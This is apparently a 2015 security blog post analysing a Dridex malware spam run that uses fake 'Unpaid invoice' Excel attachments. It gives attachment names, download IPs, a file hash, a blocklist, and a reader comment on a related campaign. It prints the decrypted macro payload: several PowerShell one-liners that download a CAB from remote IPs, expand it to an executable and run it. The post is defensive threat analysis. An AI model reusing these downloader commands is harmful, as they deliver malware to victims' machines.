Sponsored by..

Tuesday, 17 February 2015

Malware spam: "Unpaid invoice [ID:9876543210]" drops Dridex

This fake invoice comes with no body text, a random ID: in the subject and a randomly-named malicious Excel attachment

Date:    17 February 2015 at 14:05
Subject:    Unpaid invoice [ID:9876543210]
Some example attachment names are:

3356201778.xls
5EABA06572.xls
6F5FE56048.xls
A6AA331555.xls
B2D4C97246.xls
C9E5445852.xls

There are found different variants, all with very low detection rates at VirusTotal [1] [2] [3] [4]. Each one contains a different variety of macros, and unlike previous spam runs, these are individual modules (which frankly makes it no harder to analyse, just harder to put into Pastebin).

When we decrypt the strings in the macro, we see:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://78.129.153.27/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.87/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://62.76.43.194/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.4.232.206/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
This combines the recent Powershell trick with a new one. Instead of downloading an EXE file, it downloads and unpacks a CAB file, dfssk.cab which is saved in the %TEMP% folder and then expanded to %TEMP%\JIOiodfhioIH.exe.

These download locations are:
92.63.88.87 (MWTV, Latvia)
78.129.153.27 (iomart, UK)
62.76.43.194 (IT House / Clodo-Cloud, Russia)
46.4.232.206 (Hetzner, Germany / Dmitry Zheltov, Russia)

Automated analysis tools [1] [2] [3] show this POSTing to 92.63.88.97 (MWTV,  Latvia), which is definitely worth blocking. Note that one of the download locations for the binary is only a few IPs away at  92.63.88.87.

ThreatExpert also shows attempted network connections to 92.63.88.97 plus:
136.243.237.194 (Hetzner, Germany)
74.208.68.243 (1&1, US)

This Malwr report shows a DLL with MD5 b83b18ffe375fad452c02bdf477864fe which has a VirusTotal detection rate of 3/57.

Recommended blocklist:
92.63.88.97
92.63.88.87
78.129.153.27
62.76.43.194

46.4.232.206
136.243.237.194
74.208.68.243

1 comment:

Robin Norris said...

Same payload being delivered with the Subject heading "Service Suspension Notification [ID: 10-character-string]

In most cases sender name reflects recipient name. (ex. Sender=joe.smithy@someplace.com Recipient=joe.smith@mycompany.com)

Message ID reflects recipient domain (ex. ca74e7079091b46602507114408a5ae6@mycompany.com)